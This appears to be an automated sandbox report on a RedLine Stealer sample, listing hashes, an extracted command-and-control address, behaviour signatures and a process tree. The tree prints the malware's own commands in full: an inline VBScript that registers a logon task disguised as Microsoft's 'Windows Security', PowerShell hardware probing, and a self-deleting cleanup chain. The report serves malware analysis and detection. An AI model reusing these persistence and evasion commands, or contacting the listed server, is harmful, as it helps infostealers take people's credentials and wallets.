Analysis
-
max time kernel
151s -
max time network
152s -
platform
windows10_x64 -
resource
win10-20220310-en -
submitted
21-03-2022 15:40
Static task
static1
Behavioral task
behavioral1
Sample
18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe
Resource
win10-20220310-en
General
-
Target
18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe
-
Size
102KB
-
MD5
37bd9e1832978b6c5044fdc28694c765
-
SHA1
a6840f04877701c607d8afa373ee6ec86a4a3975
-
SHA256
18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973
-
SHA512
d0e7972c9d67384ac59c76f763a1f8ab3fec921db68beee321cb91e47a35fafa789396baee10c8ade0d1585c450a2f4f5ce2a2b05d1b6466ee985bcfaced79e4
Malware Config
Extracted
redline
@JABKA9983
65.108.82.103:15914
-
auth_value
3da459a4f4fcd6fe99288a78b3680c31
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2552-118-0x0000000000C50000-0x0000000000C70000-memory.dmp family_redline -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
build.exeWindows Security.exepid process 912 build.exe 3832 Windows Security.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1248 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4040 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exebuild.exeWindows Security.exepowershell.exepowershell.exepid process 2552 18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe 912 build.exe 912 build.exe 912 build.exe 912 build.exe 912 build.exe 912 build.exe 912 build.exe 912 build.exe 912 build.exe 912 build.exe 912 build.exe 912 build.exe 912 build.exe 912 build.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3148 powershell.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3148 powershell.exe 3148 powershell.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 2916 powershell.exe 2916 powershell.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 2916 powershell.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe 3832 Windows Security.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Windows Security.exepid process 3832 Windows Security.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exebuild.exeWindows Security.exetaskkill.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2552 18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe Token: SeDebugPrivilege 912 build.exe Token: SeDebugPrivilege 3832 Windows Security.exe Token: SeDebugPrivilege 4040 taskkill.exe Token: SeDebugPrivilege 3148 powershell.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 516 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exebuild.execmd.execmd.exeWindows Security.execmd.execmd.execmd.exedescription pid process target process PID 2552 wrote to memory of 912 2552 18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe build.exe PID 2552 wrote to memory of 912 2552 18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe build.exe PID 912 wrote to memory of 1440 912 build.exe cmd.exe PID 912 wrote to memory of 1440 912 build.exe cmd.exe PID 1440 wrote to memory of 3832 1440 cmd.exe Windows Security.exe PID 1440 wrote to memory of 3832 1440 cmd.exe Windows Security.exe PID 912 wrote to memory of 3220 912 build.exe cmd.exe PID 912 wrote to memory of 3220 912 build.exe cmd.exe PID 3220 wrote to memory of 4040 3220 cmd.exe taskkill.exe PID 3220 wrote to memory of 4040 3220 cmd.exe taskkill.exe PID 3832 wrote to memory of 192 3832 Windows Security.exe cmd.exe PID 3832 wrote to memory of 192 3832 Windows Security.exe cmd.exe PID 192 wrote to memory of 1888 192 cmd.exe cscript.exe PID 192 wrote to memory of 1888 192 cmd.exe cscript.exe PID 3220 wrote to memory of 3148 3220 cmd.exe powershell.exe PID 3220 wrote to memory of 3148 3220 cmd.exe powershell.exe PID 3832 wrote to memory of 680 3832 Windows Security.exe cmd.exe PID 3832 wrote to memory of 680 3832 Windows Security.exe cmd.exe PID 680 wrote to memory of 2916 680 cmd.exe powershell.exe PID 680 wrote to memory of 2916 680 cmd.exe powershell.exe PID 3220 wrote to memory of 1248 3220 cmd.exe timeout.exe PID 3220 wrote to memory of 1248 3220 cmd.exe timeout.exe PID 3832 wrote to memory of 816 3832 Windows Security.exe cmd.exe PID 3832 wrote to memory of 816 3832 Windows Security.exe cmd.exe PID 816 wrote to memory of 516 816 cmd.exe powershell.exe PID 816 wrote to memory of 516 816 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe"C:\Users\Admin\AppData\Local\Temp\18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : const ActionTypeExecutable=0 : const TASK_LOGON_INTERACTIVE_TOKEN=3 : const createOrUpdateTask=6 : Set service=CreateObject("Schedule.Service") : call service.Connect() : Dim rootFolder : Set rootFolder=service.GetFolder("") : Dim taskDefinition : Set taskDefinition=service.NewTask(0) : Dim regInfo : Set regInfo=taskDefinition.RegistrationInfo : regInfo.Author="Microsoft Corporation" : regInfo.Description="Windows Security is a software application that safeguards a system from malware. It was an anti-spyware program built to fight unauthorized access and protect Windows computers from unwanted software." : Dim settings : Set settings=taskDefinition.Settings : settings.StartWhenAvailable=True : settings.ExecutionTimeLimit="PT0S" : settings.AllowHardTerminate=False : settings.IdleSettings.StopOnIdleEnd=False : settings.DisallowStartIfOnBatteries=False : settings.StopIfGoingOnBatteries=False : Dim triggers : Set triggers=taskDefinition.Triggers : Dim trigger : Set trigger=triggers.Create(TriggerTypeLogon) : userId=CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERNAME%") : trigger.Id="LogonTriggerId" : trigger.UserId=userId : Dim Action : Set Action=taskDefinition.Actions.Create(ActionTypeExecutable) : Action.Path="C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe" : taskDefinition.Principal.UserId=userId : taskDefinition.Principal.LogonType=TASK_LOGON_INTERACTIVE_TOKEN : call rootFolder.RegisterTaskDefinition("Windows Security", taskDefinition, createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) > C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs & cscript //nologo C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs & del C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs /f /q & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs6⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c powershell -command "$driverDesc = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.DriverDesc -ErrorAction SilentlyContinue).\"HardwareInformation.DriverDesc\"; $driverDesc" & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "$driverDesc = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.DriverDesc -ErrorAction SilentlyContinue).\"HardwareInformation.DriverDesc\"; $driverDesc"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c powershell -command "$qwMemorySize = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.qwMemorySize -ErrorAction SilentlyContinue).\"HardwareInformation.qwMemorySize\"; [math]::round($qwMemorySize/1MB)" & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "$qwMemorySize = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.qwMemorySize -ErrorAction SilentlyContinue).\"HardwareInformation.qwMemorySize\"; [math]::round($qwMemorySize/1MB)"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /PID 912 & powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\Admin\AppData\Local\Temp\build.exe') }).Terminate()" & timeout 3 > nul & del /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\build.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 9124⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\Admin\AppData\Local\Temp\build.exe') }).Terminate()"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
17286868c0a043ae5d2ff5798b6a3163
SHA1b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401
SHA25640321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6
SHA512e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9a3b058eeb3866979a8ae40c50afcad5
SHA15cb721e20622946ae015bb8f29fd731d9c722602
SHA256a68952b9b61d0da3111b16a8572c35c16f06b95d33b0f7da73ef831584abb9da
SHA5120c741adc8ab9e9a91429dbef62ced45a5887da080caae289a86e2b5f9a721733d8e0d000765fa826805d9288d9485ed42b3a7f0e87e042d142b0b6eeb41f6cec
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9a3b058eeb3866979a8ae40c50afcad5
SHA15cb721e20622946ae015bb8f29fd731d9c722602
SHA256a68952b9b61d0da3111b16a8572c35c16f06b95d33b0f7da73ef831584abb9da
SHA5120c741adc8ab9e9a91429dbef62ced45a5887da080caae289a86e2b5f9a721733d8e0d000765fa826805d9288d9485ed42b3a7f0e87e042d142b0b6eeb41f6cec
-
C:\Users\Admin\AppData\Local\Temp\build.exeMD5
d1db0a92a4c72b887cc16a32e9d285a8
SHA187d0c2dffc47615b70557399c8cf937f55599713
SHA25695fc31e41a4134e57b2ebc1f31f0857dcf98ba3a0f78f0675e2c8c45c32bc19b
SHA51231557170e2485584ace194d9337d073e73c18e42806edf796c1fef981301c6ae2748a1d72406545380e0b7f099c0cb4e4337b7d61673f825b49a3cbf1b87de71
-
C:\Users\Admin\AppData\Local\Temp\build.exeMD5
d1db0a92a4c72b887cc16a32e9d285a8
SHA187d0c2dffc47615b70557399c8cf937f55599713
SHA25695fc31e41a4134e57b2ebc1f31f0857dcf98ba3a0f78f0675e2c8c45c32bc19b
SHA51231557170e2485584ace194d9337d073e73c18e42806edf796c1fef981301c6ae2748a1d72406545380e0b7f099c0cb4e4337b7d61673f825b49a3cbf1b87de71
-
C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbsMD5
d40d18b617c382f94c2cf8f4ee7e9682
SHA17669d7e3b770f35be2a516ffacd481437eb93f3e
SHA2565459eaee5107d59891a50f3d2b6d7eef0ac30216ae66e0e6a010f34c23d2f770
SHA51222101058b8d14b320216e2f698f9f985e6f52e821c62c3fb9a09b9eb0d7537339676e11728ed978ac9191c032335d1d86c56b34065b9f22f85e43a9bdeaafbac
-
C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exeMD5
d1db0a92a4c72b887cc16a32e9d285a8
SHA187d0c2dffc47615b70557399c8cf937f55599713
SHA25695fc31e41a4134e57b2ebc1f31f0857dcf98ba3a0f78f0675e2c8c45c32bc19b
SHA51231557170e2485584ace194d9337d073e73c18e42806edf796c1fef981301c6ae2748a1d72406545380e0b7f099c0cb4e4337b7d61673f825b49a3cbf1b87de71
-
C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exeMD5
d1db0a92a4c72b887cc16a32e9d285a8
SHA187d0c2dffc47615b70557399c8cf937f55599713
SHA25695fc31e41a4134e57b2ebc1f31f0857dcf98ba3a0f78f0675e2c8c45c32bc19b
SHA51231557170e2485584ace194d9337d073e73c18e42806edf796c1fef981301c6ae2748a1d72406545380e0b7f099c0cb4e4337b7d61673f825b49a3cbf1b87de71
-
memory/516-228-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmpFilesize
9.9MB
-
memory/516-230-0x0000023DBD080000-0x0000023DBD082000-memory.dmpFilesize
8KB
-
memory/516-232-0x0000023DBD083000-0x0000023DBD085000-memory.dmpFilesize
8KB
-
memory/912-140-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmpFilesize
9.9MB
-
memory/912-137-0x00000000005E0000-0x00000000005E6000-memory.dmpFilesize
24KB
-
memory/912-136-0x00000000004A0000-0x00000000004E0000-memory.dmpFilesize
256KB
-
memory/2552-128-0x0000000006650000-0x0000000006B4E000-memory.dmpFilesize
5.0MB
-
memory/2552-127-0x0000000005A70000-0x0000000005B02000-memory.dmpFilesize
584KB
-
memory/2552-132-0x0000000007300000-0x00000000074C2000-memory.dmpFilesize
1.8MB
-
memory/2552-131-0x0000000006FE0000-0x0000000007030000-memory.dmpFilesize
320KB
-
memory/2552-130-0x0000000006550000-0x00000000065B6000-memory.dmpFilesize
408KB
-
memory/2552-129-0x0000000005B10000-0x0000000005B2E000-memory.dmpFilesize
120KB
-
memory/2552-118-0x0000000000C50000-0x0000000000C70000-memory.dmpFilesize
128KB
-
memory/2552-133-0x0000000007A00000-0x0000000007F2C000-memory.dmpFilesize
5.2MB
-
memory/2552-126-0x0000000005950000-0x00000000059C6000-memory.dmpFilesize
472KB
-
memory/2552-119-0x0000000073A50000-0x000000007413E000-memory.dmpFilesize
6.9MB
-
memory/2552-120-0x0000000005B40000-0x0000000006146000-memory.dmpFilesize
6.0MB
-
memory/2552-125-0x0000000005640000-0x000000000568B000-memory.dmpFilesize
300KB
-
memory/2552-121-0x00000000055A0000-0x00000000055B2000-memory.dmpFilesize
72KB
-
memory/2552-122-0x00000000056D0000-0x00000000057DA000-memory.dmpFilesize
1.0MB
-
memory/2552-123-0x0000000005530000-0x0000000005B36000-memory.dmpFilesize
6.0MB
-
memory/2552-124-0x0000000005600000-0x000000000563E000-memory.dmpFilesize
248KB
-
memory/2916-187-0x0000019F7ACE0000-0x0000019F7ACE2000-memory.dmpFilesize
8KB
-
memory/2916-186-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmpFilesize
9.9MB
-
memory/2916-188-0x0000019F7ACE3000-0x0000019F7ACE5000-memory.dmpFilesize
8KB
-
memory/3148-160-0x000002186CDF3000-0x000002186CDF5000-memory.dmpFilesize
8KB
-
memory/3148-158-0x000002186CDF0000-0x000002186CDF2000-memory.dmpFilesize
8KB
-
memory/3148-156-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmpFilesize
9.9MB
-
memory/3148-153-0x000002186F0B0000-0x000002186F126000-memory.dmpFilesize
472KB
-
memory/3148-149-0x000002186CDC0000-0x000002186CDE2000-memory.dmpFilesize
136KB
-
memory/3832-185-0x0000000003370000-0x000000001B370000-memory.dmpFilesize
384.0MB
-
memory/3832-142-0x000000001BDB0000-0x000000001BDB2000-memory.dmpFilesize
8KB
-
memory/3832-141-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmpFilesize
9.9MB